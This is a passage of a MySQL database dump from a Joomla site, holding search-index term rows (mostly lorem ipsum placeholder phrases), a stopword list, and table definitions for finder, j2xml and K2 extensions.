qui blandit','dignissim qui blandit',0,1,1.7,'D252521453',4),(183,'dolor','dolor',0,0,0.3333,'D460',4),(184,'dolor in','dolor in',0,1,1.2667,'D465',4),(185,'dolor in hendrerit','dolor in hendrerit',0,1,1.6,'D465363',4),(186,'dolor sit','dolor sit',0,1,1.3,'D4623',4),(187,'dolor sit amet','dolor sit amet',0,1,1.4667,'D462353',4),(188,'dolore','dolore',0,0,0.4,'D460',4),(189,'dolore eu','dolore eu',0,1,1.3,'D460',4),(190,'dolore eu feugiat','dolore eu feugiat',0,1,1.5667,'D46123',4),(191,'dolore magna','dolore magna',0,1,1.4,'D46525',4),(192,'dolore magna aliquam','dolore magna aliquam',0,1,1.6667,'D46525425',4),(193,'dolore te','dolore te',0,1,1.3,'D463',4),(194,'dolore te feugait','dolore te feugait',0,1,1.5667,'D463123',4),(195,'duis','duis',0,0,0.2667,'D200',4),(196,'duis autem','duis autem',0,1,1.3333,'D235',4),(197,'duis autem vel','duis autem vel',0,1,1.4667,'D23514',4),(198,'duis dolore','duis dolore',0,1,1.3667,'D2346',4),(199,'duis dolore te','duis dolore te',0,1,1.4667,'D23463',4),(200,'ea','ea',0,0,0.1333,'E000',4),(201,'ea commodo','ea commodo',0,1,1.3333,'E253',4),(202,'ea commodo consequat','ea commodo consequat',0,1,1.6667,'E2532523',4),(203,'elit','elit',0,0,0.2667,'E430',4),(204,'elit sed','elit sed',0,1,1.2667,'E4323',4),(205,'elit sed diam','elit sed diam',0,1,1.4333,'E43235',4),(206,'enim','enim',0,0,0.2667,'E500',4),(207,'enim ad','enim ad',0,1,1.2333,'E530',4),(208,'enim ad minim','enim ad minim',0,1,1.4333,'E535',4),(209,'erat','erat',0,0,0.2667,'E630',4),(210,'erat volutpat','erat volutpat',0,1,1.4333,'E6314313',4),(211,'erat volutpat ut','erat volutpat ut',0,1,1.5333,'E6314313',4),(212,'eros','eros',0,0,0.2667,'E620',4),(213,'eros et','eros et',0,1,1.2333,'E623',4),(214,'eros et accumsan','eros et accumsan',0,1,1.5333,'E6232525',4),(215,'esse','esse',0,0,0.2667,'E200',4),(216,'esse molestie','esse molestie',0,1,1.4333,'E25423',4),(217,'esse molestie consequat','esse molestie consequat',0,1,1.7667,'E254232523',4),(218,'et','et',0,0,0.1333,'E300',4),(219,'et accumsan','et accumsan',0,1,1.3667,'E32525',4),(220,'et accumsan et','et accumsan et',0,1,1.4667,'E325253',4),(221,'et iusto','et iusto',0,1,1.2667,'E323',4),(222,'et iusto odio','et iusto odio',0,1,1.4333,'E323',4),(223,'eu','eu',0,0,0.1333,'E000',4),(224,'eu feugiat','eu feugiat',0,1,1.3333,'E123',4),(225,'eu feugiat nulla','eu feugiat nulla',0,1,1.5333,'E12354',4),(226,'euismod','euismod',0,0,0.4667,'E253',4),(227,'euismod tincidunt','euismod tincidunt',0,1,1.5667,'E25352353',4),(228,'euismod tincidunt ut','euismod tincidunt ut',0,1,1.6667,'E25352353',4),(229,'eum','eum',0,0,0.2,'E500',4),(230,'eum iriure','eum iriure',0,1,1.3333,'E560',4),(231,'eum iriure dolor','eum iriure dolor',0,1,1.5333,'E56346',4),(232,'ex','ex',0,0,0.1333,'E200',4),(233,'ex ea','ex ea',0,1,1.1667,'E200',4),(234,'ex ea commodo','ex ea commodo',0,1,1.4333,'E253',4),(235,'exerci','exerci',0,0,0.4,'E262',4),(236,'exerci tation','exerci tation',0,1,1.4333,'E26235',4),(237,'exerci tation ullamcorper','exerci tation ullamcorper',0,1,1.8333,'E26235452616',4),(238,'facilisi','facilisi',0,0,0.5333,'F242',4),(239,'facilisis','facilisis',0,0,0.6,'F242',4),(240,'facilisis at','facilisis at',0,1,1.4,'F2423',4),(241,'facilisis at vero','facilisis at vero',0,1,1.5667,'F242316',4),(242,'fair','fair',0,0,0.2667,'F600',1),(243,'fair set','fair set',0,1,1.2667,'F623',1),(244,'fair set for','fair set for',0,1,1.4,'F62316',1),(245,'fall','fall',0,0,0.2667,'F400',1),(246,'fall career','fall career',0,1,1.3667,'F426',1),(247,'fall career fair','fall career fair',0,1,1.5333,'F42616',1),(248,'feugait','feugait',0,0,0.4667,'F230',4),(249,'feugait nulla','feugait nulla',0,1,1.4333,'F2354',4),(250,'feugait nulla facilisi','feugait nulla facilisi',0,1,1.7333,'F23541242',4),(251,'feugiat','feugiat',0,0,0.4667,'F230',4),(252,'feugiat nulla','feugiat nulla',0,1,1.4333,'F2354',4),(253,'feugiat nulla facilisis','feugiat nulla facilisis',0,1,1.7667,'F23541242',4),(254,'for','for',0,0,0.2,'F600',1),(255,'for sept','for sept',0,1,1.2667,'F6213',1),(256,'for sept 25','for sept 25',0,1,1.3667,'F6213',1),(257,'hendrerit','hendrerit',0,0,0.6,'H5363',4),(258,'hendrerit in','hendrerit in',0,1,1.4,'H53635',4),(259,'hendrerit in vulputate','hendrerit in vulputate',0,1,1.7333,'H536351413',4),(260,'illum','illum',0,0,0.3333,'I450',4),(261,'illum dolore','illum dolore',0,1,1.4,'I45346',4),(262,'illum dolore eu','illum dolore eu',0,1,1.5,'I45346',4),(263,'in','in',0,0,0.1333,'I500',4),(264,'in hendrerit','in hendrerit',0,1,1.4,'I5363',4),(265,'in hendrerit in','in hendrerit in',0,1,1.5,'I53635',4),(266,'in vulputate','in vulputate',0,1,1.4,'I51413',4),(267,'in vulputate velit','in vulputate velit',0,1,1.6,'I51413143',4),(268,'ipsum','ipsum',0,0,0.3333,'I125',4),(269,'ipsum dolor','ipsum dolor',0,1,1.3667,'I125346',4),(270,'ipsum dolor sit','ipsum dolor sit',0,1,1.5,'I12534623',4),(271,'iriure','iriure',0,0,0.4,'I600',4),(272,'iriure dolor','iriure dolor',0,1,1.4,'I6346',4),(273,'iriure dolor in','iriure dolor in',0,1,1.5,'I63465',4),(274,'iusto','iusto',0,0,0.3333,'I230',4),(275,'iusto odio','iusto odio',0,1,1.3333,'I230',4),(276,'iusto odio dignissim','iusto odio dignissim',0,1,1.6667,'I232525',4),(277,'laoreet','laoreet',0,0,0.4667,'L630',4),(278,'laoreet dolore','laoreet dolore',0,1,1.4667,'L6346',4),(279,'laoreet dolore magna','laoreet dolore magna',0,1,1.6667,'L6346525',4),(280,'latest news analysis','latest news analysis',0,1,1.6667,'L32352542',1),(281,'lobortis','lobortis',0,0,0.5333,'L1632',4),(282,'lobortis nisl','lobortis nisl',0,1,1.4333,'L1632524',4),(283,'lobortis nisl ut','lobortis nisl ut',0,1,1.5333,'L16325243',4),(284,'lorem','lorem',0,0,0.3333,'L650',4),(285,'lorem ipsum','lorem ipsum',0,1,1.3667,'L65125',4),(286,'lorem ipsum dolor','lorem ipsum dolor',0,1,1.5667,'L65125346',4),(287,'luptatum','luptatum',0,0,0.5333,'L135',4),(288,'luptatum zzril','luptatum zzril',0,1,1.4667,'L135264',4),(289,'luptatum zzril delenit','luptatum zzril delenit',0,1,1.7333,'L1352643453',4),(290,'magna','magna',0,0,0.3333,'M250',4),(291,'magna aliquam','magna aliquam',0,1,1.4333,'M25425',4),(292,'magna aliquam erat','magna aliquam erat',0,1,1.6,'M2542563',4),(293,'minim','minim',0,0,0.3333,'M000',4),(294,'minim veniam','minim veniam',0,1,1.4,'M150',4),(295,'minim veniam quis','minim veniam quis',0,1,1.5667,'M152',4),(296,'molestie','molestie',0,0,0.5333,'M423',4),(297,'molestie consequat','molestie consequat',0,1,1.6,'M4232523',4),(298,'molestie consequat vel','molestie consequat vel',0,1,1.7333,'M423252314',4),(299,'news analysis','news analysis',0,1,1.4333,'N2542',1),(300,'nibh','nibh',0,0,0.2667,'N100',4),(301,'nibh euismod','nibh euismod',0,1,1.4,'N1253',4),(302,'nibh euismod tincidunt','nibh euismod tincidunt',0,1,1.7333,'N125352353',4),(303,'nisl','nisl',0,0,0.2667,'N240',4),(304,'nisl ut','nisl ut',0,1,1.2333,'N243',4),(305,'nisl ut aliquip','nisl ut aliquip',0,1,1.5,'N243421',4),(306,'nonummy','nonummy',0,0,0.4667,'N000',4),(307,'nonummy nibh','nonummy nibh',0,1,1.4,'N100',4),(308,'nonummy nibh euismod','nonummy nibh euismod',0,1,1.6667,'N1253',4),(309,'nostrud','nostrud',0,0,0.4667,'N2363',4),(310,'nostrud exerci','nostrud exerci',0,1,1.4667,'N2363262',4),(311,'nostrud exerci tation','nostrud exerci tation',0,1,1.7,'N236326235',4),(312,'nulla','nulla',0,0,0.3333,'N400',4),(313,'nulla facilisi','nulla facilisi',0,1,1.4667,'N41242',4),(314,'nulla facilisis','nulla facilisis',0,1,1.5,'N41242',4),(315,'nulla facilisis at','nulla facilisis at',0,1,1.6,'N412423',4),(316,'odio','odio',0,0,0.2667,'O300',4),(317,'odio dignissim','odio dignissim',0,1,1.4667,'O32525',4),(318,'odio dignissim qui','odio dignissim qui',0,1,1.6,'O325252',4),(319,'praesent','praesent',0,0,0.5333,'P6253',4),(320,'praesent luptatum','praesent luptatum',0,1,1.5667,'P62534135',4),(321,'praesent luptatum zzril','praesent luptatum zzril',0,1,1.7667,'P62534135264',4),(322,'qui','qui',0,0,0.2,'Q000',4),(323,'qui blandit','qui blandit',0,1,1.3667,'Q1453',4),(324,'qui blandit praesent','qui blandit praesent',0,1,1.6667,'Q145316253',4),(325,'quis','quis',0,0,0.2667,'Q000',4),(326,'quis nostrud','quis nostrud',0,1,1.4,'Q52363',4),(327,'quis nostrud exerci','quis nostrud exerci',0,1,1.6333,'Q52363262',4),(328,'sed','sed',0,0,0.2,'S300',4),(329,'sed diam','sed diam',0,1,1.2667,'S350',4),(330,'sed diam nonummy','sed diam nonummy',0,1,1.5333,'S350',4),(331,'sept','sept',0,0,0.2667,'S130',1),(332,'sept 25','sept 25',0,1,1.2333,'S130',1),(333,'set','set',0,0,0.2,'S300',1),(334,'set for','set for',0,1,1.2333,'S316',1),(335,'set for sept','set for sept',0,1,1.4,'S316213',1),(336,'sit','sit',0,0,0.2,'S300',4),(337,'sit amet','sit amet',0,1,1.2667,'S353',4),(338,'sit amet consectetuer','sit amet consectetuer',0,1,1.7,'S35325236',4),(339,'suscipit','suscipit',0,0,0.5333,'S130',4),(340,'suscipit lobortis','suscipit lobortis',0,1,1.5667,'S1341632',4),(341,'suscipit lobortis nisl','suscipit lobortis nisl',0,1,1.7333,'S1341632524',4),(342,'tation','tation',0,0,0.4,'T500',4),(343,'tation ullamcorper','tation ullamcorper',0,1,1.6,'T5452616',4),(344,'tation ullamcorper suscipit','tation ullamcorper suscipit',0,1,1.9,'T5452616213',4),(345,'te','te',0,0,0.1333,'T000',4),(346,'te feugait','te feugait',0,1,1.3333,'T123',4),(347,'te feugait nulla','te feugait nulla',0,1,1.5333,'T12354',4),(348,'tincidunt','tincidunt',0,0,0.6,'T52353',4),(349,'tincidunt ut','tincidunt ut',0,1,1.4,'T52353',4),(350,'tincidunt ut laoreet','tincidunt ut laoreet',0,1,1.6667,'T52353463',4),(351,'ullamcorper','ullamcorper',0,0,0.7333,'U452616',4),(352,'ullamcorper suscipit','ullamcorper suscipit',0,1,1.6667,'U452616213',4),(353,'ullamcorper suscipit lobortis','ullamcorper suscipit lobortis',0,1,1.9667,'U45261621341632',4),(354,'ut','ut',0,0,0.1333,'U300',4),(355,'ut aliquip','ut aliquip',0,1,1.3333,'U3421',4),(356,'ut aliquip ex','ut aliquip ex',0,1,1.4333,'U34212',4),(357,'ut laoreet','ut laoreet',0,1,1.3333,'U3463',4),(358,'ut laoreet dolore','ut laoreet dolore',0,1,1.5667,'U346346',4),(359,'ut wisi','ut wisi',0,1,1.2333,'U320',4),(360,'ut wisi enim','ut wisi enim',0,1,1.4,'U325',4),(361,'vel','vel',0,0,0.2,'V400',4),(362,'vel eum','vel eum',0,1,1.2333,'V450',4),(363,'vel eum iriure','vel eum iriure',0,1,1.4667,'V456',4),(364,'vel illum','vel illum',0,1,1.3,'V450',4),(365,'vel illum dolore','vel illum dolore',0,1,1.5333,'V45346',4),(366,'velit','velit',0,0,0.3333,'V430',4),(367,'velit esse','velit esse',0,1,1.3333,'V432',4),(368,'velit esse molestie','velit esse molestie',0,1,1.6333,'V4325423',4),(369,'veniam','veniam',0,0,0.4,'V500',4),(370,'veniam quis','veniam quis',0,1,1.3667,'V520',4),(371,'veniam quis nostrud','veniam quis nostrud',0,1,1.6333,'V5252363',4),(372,'vero','vero',0,0,0.2667,'V600',4),(373,'vero eros','vero eros',0,1,1.3,'V620',4),(374,'vero eros et','vero eros et',0,1,1.4,'V623',4),(375,'volutpat','volutpat',0,0,0.5333,'V4313',4),(376,'volutpat ut','volutpat ut',0,1,1.3667,'V4313',4),(377,'volutpat ut wisi','volutpat ut wisi',0,1,1.5333,'V43132',4),(378,'vulputate','vulputate',0,0,0.6,'V413',4),(379,'vulputate velit','vulputate velit',0,1,1.5,'V413143',4),(380,'vulputate velit esse','vulputate velit esse',0,1,1.6667,'V4131432',4),(381,'wisi','wisi',0,0,0.2667,'W200',4),(382,'wisi enim','wisi enim',0,1,1.3,'W250',4),(383,'wisi enim ad','wisi enim ad',0,1,1.4,'W253',4),(384,'zzril','zzril',0,0,0.3333,'Z640',4),(385,'zzril delenit','zzril delenit',0,1,1.4333,'Z643453',4),(386,'zzril delenit augue','zzril delenit augue',0,1,1.6333,'Z6434532',4),(639,'2','2',0,0,0.1,'',1),(640,'a','a',0,0,0.0667,'A000',2),(641,'a night','a night',0,1,1.2333,'A523',1),(642,'a night of','a night of',0,1,1.3333,'A5231',1),(643,'adipisicing','adipisicing',0,0,0.7333,'A31252',3),(644,'adipisicing elit','adipisicing elit',0,1,1.5333,'A3125243',3),(645,'adipisicing elit sed','adipisicing elit sed',0,1,1.6667,'A312524323',3),(646,'and','and',0,0,0.2,'A530',1),(647,'and dinner','and dinner',0,1,1.3333,'A5356',1),(648,'and dinner nsectetur','and dinner nsectetur',0,1,1.6667,'A53565236',1),(649,'dido','dido',0,0,0.2667,'D000',1),(650,'dido drama','dido drama',0,1,1.3333,'D650',1),(651,'dido drama and','dido drama and',0,1,1.4667,'D653',1),(652,'dinner','dinner',0,0,0.4,'D560',1),(653,'dinner nsectetur','dinner nsectetur',0,1,1.5333,'D565236',1),(654,'dinner nsectetur adipisicing','dinner nsectetur adipisicing',0,1,1.9333,'D56523631252',1),(655,'do','do',0,0,0.1333,'D000',3),(656,'do eiusmod','do eiusmod',0,1,1.3333,'D253',3),(657,'do eiusmod tempor','do eiusmod tempor',0,1,1.5667,'D253516',3),(658,'drama','drama',0,0,0.3333,'D650',1),(659,'drama and','drama and',0,1,1.3,'D653',1),(660,'drama and dinner','drama and dinner',0,1,1.5333,'D65356',1),(661,'eiusmod','eiusmod',0,0,0.4667,'E253',3),(662,'eiusmod tempor','eiusmod tempor',0,1,1.4667,'E253516',3),(663,'elit sed do','elit sed do',0,1,1.3667,'E4323',3),(664,'night','night',0,0,0.3333,'N230',1),(665,'night of','night of',0,1,1.2667,'N231',1),(666,'night of dido','night of dido',0,1,1.4333,'N2313',1),(667,'nsectetur','nsectetur',0,0,0.6,'N236',1),(668,'nsectetur adipisicing','nsectetur adipisicing',0,1,1.7,'N23631252',1),(669,'nsectetur adipisicing elit','nsectetur adipisicing elit',0,1,1.8667,'N2363125243',1),(670,'of','of',0,0,0.1333,'O100',1),(671,'of dido','of dido',0,1,1.2333,'O130',1),(672,'of dido drama','of dido drama',0,1,1.4333,'O1365',1),(673,'sed do','sed do',0,1,1.2,'S300',3),(674,'sed do eiusmod','sed do eiusmod',0,1,1.4667,'S3253',3),(675,'tempor','tempor',0,0,0.4,'T516',3),(702,'2013','2013',0,0,0.4,'',1),(703,'2013 adipisicing','2013 adipisicing',0,1,1.5333,'A31252',1),(704,'2013 adipisicing elit','2013 adipisicing elit',0,1,1.7,'A3125243',1),(705,'3','3',0,0,0.1,'',1),(706,'celebrates','celebrates',0,0,0.6667,'C41632',1),(707,'celebrates oxford','celebrates oxford',0,1,1.5667,'C41632163',1),(708,'celebrates oxford open','celebrates oxford open',0,1,1.7333,'C4163216315',1),(709,'doors','doors',0,0,0.3333,'D620',1),(710,'doors 2013','doors 2013',0,1,1.3333,'D620',1),(711,'doors 2013 adipisicing','doors 2013 adipisicing',0,1,1.7333,'D6231252',1),(712,'open','open',0,0,0.2667,'O150',1),(713,'open doors','open doors',0,1,1.3333,'O15362',1),(714,'open doors 2013','open doors 2013',0,1,1.5,'O15362',1),(715,'oxford','oxford',0,0,0.4,'O2163',2),(716,'oxford open','oxford open',0,1,1.3667,'O216315',1),(717,'oxford open doors','oxford open doors',0,1,1.5667,'O216315362',1),(718,'university','university',0,0,0.6667,'U51623',1),(719,'university celebrates','university celebrates',0,1,1.7,'U51623241632',1),(720,'university celebrates oxford','university celebrates oxford',0,1,1.9333,'U51623241632163',1),(733,'4','4',0,0,0.1,'',1),(734,'a new','a new',0,1,1.1667,'A500',1),(735,'a new multiple','a new multiple',0,1,1.4667,'A54314',1),(736,'drug','drug',0,0,0.2667,'D620',1),(737,'drug adipisicing','drug adipisicing',0,1,1.5333,'D6231252',1),(738,'drug adipisicing elit','drug adipisicing elit',0,1,1.7,'D623125243',1),(739,'in a','in a',0,1,1.1333,'I500',1),(740,'in a new','in a new',0,1,1.2667,'I500',1),(741,'multiple','multiple',0,0,0.5333,'M4314',1),(742,'multiple sclerosis','multiple sclerosis',0,1,1.6,'M43142462',1),(743,'multiple sclerosis drug','multiple sclerosis drug',0,1,1.7667,'M43142462362',1),(744,'new','new',0,0,0.2,'N000',1),(745,'new multiple','new multiple',0,1,1.4,'N4314',1),(746,'new multiple sclerosis','new multiple sclerosis',0,1,1.7333,'N43142462',1),(747,'oxford s','oxford s',0,1,1.2667,'O21632',1),(748,'oxford s part','oxford s part',0,1,1.4333,'O21632163',1),(749,'oxford\'s','oxford',0,0,0.5333,'O21632',1),(750,'oxford\'s part','oxford part',0,1,1.4333,'O21632163',1),(751,'oxford\'s part in','oxford part in',0,1,1.5333,'O216321635',1),(752,'part','part',0,0,0.2667,'P630',1),(753,'part in','part in',0,1,1.2333,'P635',1),(754,'part in a','part in a',0,1,1.3,'P635',1),(755,'s','s',0,0,0.0667,'S000',1),(756,'s part','s part',0,1,1.2,'S163',1),(757,'s part in','s part in',0,1,1.3,'S1635',1),(758,'sclerosis','sclerosis',0,0,0.6,'S462',1),(759,'sclerosis drug','sclerosis drug',0,1,1.4667,'S462362',1),(760,'sclerosis drug adipisicing','sclerosis drug adipisicing',0,1,1.8667,'S46236231252',1),(761,'26','26',0,0,0.2,'',6),(762,'aktualizavimas','aktualizavimas',0,0,0.9333,'A2342152',6),(763,'ir aktualizavimas','ir aktualizavimas',0,1,1.5667,'I62342152',6),(764,'iveiklinimas','iveiklinimas',0,0,0.8,'I12452',6),(765,'iveiklinimas ir','iveiklinimas ir',0,1,1.5,'I124526',6),(766,'iveiklinimas ir aktualizavimas','iveiklinimas ir aktualizavimas',0,1,2,'I1245262342152',6),(767,'projektas','projektas',0,0,0.6,'P6232',6),(768,'projektas tytuvenu','projektas tytuvenu',0,1,1.6,'P6232315',6),(769,'projektas tytuvenu iveiklinimas','projektas tytuvenu iveiklinimas',0,1,2,'P623231512452',6),(770,'tytuvenu iveiklinimas','tytuvenu iveiklinimas',0,1,1.7,'T1512452',6),(771,'tytuvenu iveiklinimas ir','tytuvenu iveiklinimas ir',0,1,1.8,'T15124526',6);
/*!40000 ALTER TABLE `xyhmu_finder_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_terms_common`
--

DROP TABLE IF EXISTS `xyhmu_finder_terms_common`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_terms_common` (
  `term` varchar(75) NOT NULL,
  `language` varchar(3) NOT NULL,
  KEY `idx_word_lang` (`term`,`language`),
  KEY `idx_lang` (`language`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_terms_common`
--

LOCK TABLES `xyhmu_finder_terms_common` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_terms_common` DISABLE KEYS */;
INSERT INTO `xyhmu_finder_terms_common` VALUES ('a','en'),('about','en'),('after','en'),('ago','en'),('all','en'),('am','en'),('an','en'),('and','en'),('ani','en'),('any','en'),('are','en'),('aren\'t','en'),('as','en'),('at','en'),('be','en'),('but','en'),('by','en'),('for','en'),('from','en'),('get','en'),('go','en'),('how','en'),('if','en'),('in','en'),('into','en'),('is','en'),('isn\'t','en'),('it','en'),('its','en'),('me','en'),('more','en'),('most','en'),('must','en'),('my','en'),('new','en'),('no','en'),('none','en'),('not','en'),('noth','en'),('nothing','en'),('of','en'),('off','en'),('often','en'),('old','en'),('on','en'),('onc','en'),('once','en'),('onli','en'),('only','en'),('or','en'),('other','en'),('our','en'),('ours','en'),('out','en'),('over','en'),('page','en'),('she','en'),('should','en'),('small','en'),('so','en'),('some','en'),('than','en'),('thank','en'),('that','en'),('the','en'),('their','en'),('theirs','en'),('them','en'),('then','en'),('there','en'),('these','en'),('they','en'),('this','en'),('those','en'),('thus','en'),('time','en'),('times','en'),('to','en'),('too','en'),('true','en'),('under','en'),('until','en'),('up','en'),('upon','en'),('use','en'),('user','en'),('users','en'),('veri','en'),('version','en'),('very','en'),('via','en'),('want','en'),('was','en'),('way','en'),('were','en'),('what','en'),('when','en'),('where','en'),('whi','en'),('which','en'),('who','en'),('whom','en'),('whose','en'),('why','en'),('wide','en'),('will','en'),('with','en'),('within','en'),('without','en'),('would','en'),('yes','en'),('yet','en'),('you','en'),('your','en'),('yours','en');
/*!40000 ALTER TABLE `xyhmu_finder_terms_common` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_tokens`
--

DROP TABLE IF EXISTS `xyhmu_finder_tokens`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_tokens` (
  `term` varchar(75) NOT NULL,
  `stem` varchar(75) NOT NULL,
  `common` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `phrase` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `weight` float unsigned NOT NULL DEFAULT '1',
  `context` tinyint(1) unsigned NOT NULL DEFAULT '2',
  KEY `idx_word` (`term`),
  KEY `idx_context` (`context`)
) ENGINE=MEMORY DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_tokens`
--

LOCK TABLES `xyhmu_finder_tokens` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_tokens` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_finder_tokens` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_tokens_aggregate`
--

DROP TABLE IF EXISTS `xyhmu_finder_tokens_aggregate`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_tokens_aggregate` (
  `term_id` int(10) unsigned NOT NULL,
  `map_suffix` char(1) NOT NULL,
  `term` varchar(75) NOT NULL,
  `stem` varchar(75) NOT NULL,
  `common` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `phrase` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `term_weight` float unsigned NOT NULL,
  `context` tinyint(1) unsigned NOT NULL DEFAULT '2',
  `context_weight` float unsigned NOT NULL,
  `total_weight` float unsigned NOT NULL,
  KEY `token` (`term`),
  KEY `keyword_id` (`term_id`)
) ENGINE=MEMORY DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_tokens_aggregate`
--

LOCK TABLES `xyhmu_finder_tokens_aggregate` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_tokens_aggregate` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_finder_tokens_aggregate` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_types`
--

DROP TABLE IF EXISTS `xyhmu_finder_types`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_types` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(100) NOT NULL,
  `mime` varchar(100) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `title` (`title`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_types`
--

LOCK TABLES `xyhmu_finder_types` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_types` DISABLE KEYS */;
INSERT INTO `xyhmu_finder_types` VALUES (1,'K2 Item',''),(2,'Category',''),(3,'Contact',''),(4,'Article',''),(5,'News Feed',''),(6,'Web Link','');
/*!40000 ALTER TABLE `xyhmu_finder_types` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_j2xml_usergroups`
--

DROP TABLE IF EXISTS `xyhmu_j2xml_usergroups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_j2xml_usergroups` (
  `id` int(10) unsigned NOT NULL,
  `parent_id` int(10) unsigned NOT NULL DEFAULT '0',
  `title` varchar(100) NOT NULL DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_j2xml_usergroups`
--

LOCK TABLES `xyhmu_j2xml_usergroups` WRITE;
/*!40000 ALTER TABLE `xyhmu_j2xml_usergroups` DISABLE KEYS */;
INSERT INTO `xyhmu_j2xml_usergroups` VALUES (1,0,'[\"Public\"]'),(6,0,'[\"Public\",\"Manager\"]'),(2,0,'[\"Public\",\"Registered\"]'),(8,0,'[\"Public\",\"Super Users\"]'),(3,0,'[\"Public\",\"Registered\",\"Author\"]'),(4,0,'[\"Public\",\"Registered\",\"Author\",\"Editor\"]'),(5,0,'[\"Public\",\"Registered\",\"Author\",\"Editor\",\"Publisher\"]'),(7,0,'[\"Public\",\"Manager\",\"Administrator\"]'),(1,0,'Public'),(6,1,'Manager'),(2,1,'Registered'),(8,1,'Super Users'),(3,2,'Author'),(4,3,'Editor'),(5,4,'Publisher'),(7,6,'Administrator');
/*!40000 ALTER TABLE `xyhmu_j2xml_usergroups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_j2xml_websites`
--

DROP TABLE IF EXISTS `xyhmu_j2xml_websites`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_j2xml_websites` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `remote_url` varchar(255) NOT NULL DEFAULT '',
  `username` varchar(255) NOT NULL DEFAULT '',
  `password` varchar(255) NOT NULL DEFAULT '',
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_j2xml_websites`
--

LOCK TABLES `xyhmu_j2xml_websites` WRITE;
/*!40000 ALTER TABLE `xyhmu_j2xml_websites` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_j2xml_websites` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_k2_attachments`
--

DROP TABLE IF EXISTS `xyhmu_k2_attachments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_k2_attachments` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `itemID` int(11) NOT NULL,
  `filename` varchar(255) NOT NULL,
  `title` varchar(255) NOT NULL,
  `titleAttribute` text NOT NULL,
  `hits` int(11) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `itemID` (`itemID`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_k2_attachments`
--

LOCK TABLES `xyhmu_k2_attachments` WRITE;
/*!40000 ALTER TABLE `xyhmu_k2_attachments` DISABLE KEYS */;
INSERT INTO `xyhmu_k2_attachments` VALUES (2,26,'stendas.pdf','stendas.pdf','stendas.pdf',0);
/*!40000 ALTER TABLE `xyhmu_k2_attachments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_k2_categories`
--

DROP TABLE IF EXISTS `xyhmu_k2_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_k2_categories` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `alias` varchar(255) NOT NULL,
  `description` text NOT NULL,
  `parent` int(11) DEFAULT '0',
  `extraFieldsGroup` int(11) NOT NULL,
  `published` smallint(6) NOT NULL DEFAULT '0',
  `access` int(11) NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `image` varchar(255) NOT NULL,
  `params` text NOT NULL,
  `trash` smallint(6) NOT NULL DEFAULT '0',
  `plugins` text NOT NULL,
  `language` char(7) NOT NULL,
  PRIMARY KEY (`id`),
